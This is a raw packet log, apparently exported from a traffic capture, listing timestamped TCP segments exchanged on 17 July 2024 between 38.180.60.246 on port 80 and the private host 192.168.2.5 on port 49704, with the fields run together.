                                                                            Jul 17, 2024 15:19:56.995063066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995098114 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.995959044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995973110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995984077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995995045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996006966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996020079 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996022940 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.996108055 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.996895075 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996908903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996920109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996933937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996944904 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.996958017 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.996994019 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.997690916 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.997704983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.997715950 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.997728109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.997739077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.997754097 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.997765064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.997786999 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.997863054 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.998601913 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.998614073 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.998625994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.998640060 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.998651028 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.998665094 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.998667002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.998693943 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.999418974 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.999432087 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.999470949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.999501944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.999515057 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.999526978 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.999538898 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.999550104 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.999551058 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.999588966 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.999624014 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.000613928 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.000627041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.000638008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.000649929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.000662088 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.000673056 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.000684023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.000684977 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.000729084 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.001344919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.001358032 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.001368046 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.001379013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.001389980 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.001399994 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.001404047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.001449108 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.002242088 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.002254963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.002265930 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.002291918 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.002302885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.002315998 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.002327919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.002334118 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.002338886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.002379894 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.003181934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.003194094 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.003204107 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.003210068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.003220081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.003231049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.003241062 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.003242016 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.003264904 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.003292084 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.004066944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.004079103 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.004090071 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.004101992 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.004112959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.004126072 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.004154921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.004172087 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.029436111 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.029495955 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.029509068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.029690981 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.029803038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.029814005 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.029824972 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.029835939 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.029860973 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.029896975 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.081705093 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.081814051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.081906080 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.082092047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082103968 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082151890 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.082241058 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082264900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082278013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082292080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082335949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.082367897 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.082792044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082803965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082813978 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082828045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082839012 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082849979 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.082861900 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.082917929 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.083592892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.083604097 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.083614111 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.083626986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.083637953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.083648920 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.083653927 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.084307909 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.084309101 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.084954977 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085007906 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085045099 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085079908 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.085081100 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085109949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085125923 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085140944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085144997 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.085165977 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.085462093 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085479975 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085495949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085511923 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085527897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085530996 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.085545063 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085561991 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.085561991 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.085607052 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.085637093 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.086424112 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.086441040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.086467028 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.086482048 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.086498976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.086507082 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.086515903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.086533070 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.086546898 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.086587906 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.087316990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.087336063 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.087349892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.087364912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.087380886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.087379932 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.087397099 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.087412119 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.087454081 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.088264942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088279963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088294983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088310003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088325024 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088325024 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.088340998 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088356972 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088371992 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.088382959 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.088438988 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.089009047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089026928 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089042902 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089057922 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089070082 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.089075089 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089092016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089107037 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089113951 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.089152098 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.089180946 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.089884043 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089900970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089915991 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089931965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089946985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089962006 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089962006 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.089977980 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.089982033 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.089994907 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090044022 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.090075970 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.090775967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090792894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090821981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090837955 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090852976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090867996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090872049 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.090884924 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090894938 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.090900898 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.090940952 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.090970993 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.091614008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091630936 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091645956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091660023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091675997 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091691971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091694117 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.091706991 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091722965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.091736078 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.091767073 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.091795921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.092494011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.092509985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.092525959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.092541933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.092556000 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.092570066 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.092597961 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.092612028 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.092612982 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.092667103 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.093394995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093411922 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093426943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093441963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093458891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093457937 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.093477964 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093492985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093508005 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093513012 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.093523979 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.093552113 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.093580961 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.121717930 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.121763945 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.121778011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.121824026 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.121912956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.121938944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.121954918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.121967077 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.121970892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.122008085 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.122420073 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.122476101 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.174536943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.174593925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.174607992 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.174659967 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.174866915 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.174877882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.174887896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.174900055 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.174926043 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.174968004 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.175328016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.175339937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.175349951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.175360918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.175371885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.175383091 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.175391912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.175404072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.175441980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.175441980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.175466061 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.176203012 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176213026 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176223040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176256895 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.176440001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176451921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176466942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176505089 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.176541090 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.176547050 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176558971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176568031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176579952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176589966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.176610947 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.176647902 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.177462101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177474976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177484035 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177495956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177508116 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177520037 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177529097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.177531004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177544117 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.177553892 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.177580118 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.178340912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178352118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178363085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178374052 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178384066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178390980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.178395033 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178406954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178417921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.178419113 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.178464890 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.179601908 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.179615021 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.179625034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.179636002 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.179646969 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.179658890 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.179660082 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.179670095 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.179714918 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.179738045 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:57.180141926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:57.180154085 CEST804970438.180.60.246192.168.2.5
